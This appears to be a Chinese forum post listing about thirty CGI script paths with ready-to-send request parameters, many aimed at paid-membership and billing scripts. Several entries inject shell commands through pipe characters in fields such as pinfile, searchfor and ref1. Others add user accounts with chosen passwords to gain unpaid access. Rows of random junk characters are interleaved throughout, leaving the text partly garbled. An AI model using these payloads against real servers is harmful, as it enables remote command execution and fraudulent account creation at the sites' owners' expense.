Cgi-bin 30个漏洞＋使用方法

admin

==============================
3 l* a8 }  o, ~: y/ q
/smspass.pl
  Y) X: v# {8 h$ D8 ]& J! nusername=username&password=password

/index.cgi
wei=ren&gen=command

/passmaster.cgi
! A) L! O/ A, C2 n: {Action=Add&Username=Username&Password=Password
( e% ]) O. D& }8 I! t6 M
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|

/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
- @. M- A4 B& h( _; D- n9 C
/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
: C2 u- R* h4 y5 h+ S
/ccbill-local.asp
% W; Q5 q& `: Y/ mpost_values=username:password
+ r6 }6 h4 g2 ]: W3 u
/count.cgi
pinfile=|echo;ls -la;exit|

/recon.cgi
/ Y2 @$ ~% U: }1 D- W/recon.cgi?search
  A& c. h! o' E9 Q/ P$ wsearchoption=1&searchfor=|echo;ls -al;exit|
  o  i" W) C, {) x4 c! D; o
/verotelrum.pl
- q( c+ a# q+ j. H* ~vercode=username:password:dseegsow:add:amount<&30>
/ e) {' V4 t, I" t; p
9 B$ r# C, R- {) {7 R2 t6 N) m6 }/af.cgi
" u( ]; W: w% B* J* o7 u- ]_browser_out=|echo;ls -la;exit;|
- x. f1 u6 M6 d
: {. Q: }2 `( K$ W0 I/modify.cgi
* x2 s2 F! Q" Cusername=username&password=password&expire=30

/openjournal.cgi
) J0 t  F% V+ Z0 o7 V* D. L$ @. Medit=1&ct=2&go=|echo;ls -al;exit|

6 C3 Z( r: R4 V3 [3 J4 h/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/probecontrol.cgi
command=enable&username=username&password=password
3 L! I- O0 Q% W( @7 |
% J+ e2 ]5 Z, Z9 D/recon.cgi
+ |, X& z- d0 Osearchoption=3&searchfor=echo;ls -la;exit
5 m4 z2 l. b; _. w; \5 M
- O; |' y5 g: V  Y/htadd.pl
configfile=|echo; ls -alt; exit
8 N1 Z  y- t, r) A
1 Z0 H' B0 f( z' U! t) s/gx9passwd.cgi
8 z$ P9 m  e" D& f3 j" lcmd=ADD&user=username&pass=password

" h9 K+ P# q: Q& |/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password
5 [4 ^& V8 t& r! Y
& ]# a: w5 {# e1 d* B' m: n/cpay.cgi
" I& s/ B( E$ V3 i6 ecommand=add_member&username=username(EMAIL)&password=password(DES)
7 O/ K, O! y" N- j- ?
+ p! Q! k6 D: i3 H5 y) l/globill_ut.cgi
, r- ~/ J4 G% Z5 w! ^9 d9 Qdo=add&username=username&password=password&wpassword=password
" _5 p* `1 e( v+ q5 F! \
/usercontrol.cgi
command=enable&username=USER&password=PASS
( ]+ m: _2 {$ @. t2 J9 I4 X
  j, n# M' m5 m0 T6 ^! h- N/globoSALErum.cgi
0 t5 U; j. X, V8 @7 p8 C6 Iaction=ADD&seccode=seccode&login=username&password=password

/addusr.pl
user=USER&pass=PASS&confirm=PASS

/ e+ A. e% r+ j/ U% u& s: C! {4 S/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
8 |: v/ {* q2 P9 W0 |pinfile=|echo;pwd;exit|
" p" E$ u( U+ B2 I8 N, e
- t5 C! i: e& Q+ \" W9 S/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
% A1 H, G# u2 O9 Cusername=username&password=password&password2=password&ref1=|echo;ls -al;exit
' l1 `3 U6 \" c6 \! e$ s
/af.cgi
/env.cgi
ADD+;echo;pwd;exit

9 ], [/ ]* v3 G# V/count.cgi
! S1 F# v, J2 }1 ipinfile=|echo;pwd;exit|

" b( R6 r4 X% Z, e: s5 E/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|

) K' q7 ?( w/ ]* N8 f' a1 U: `/add.cgi
username=username&password=password&expire=30

==============================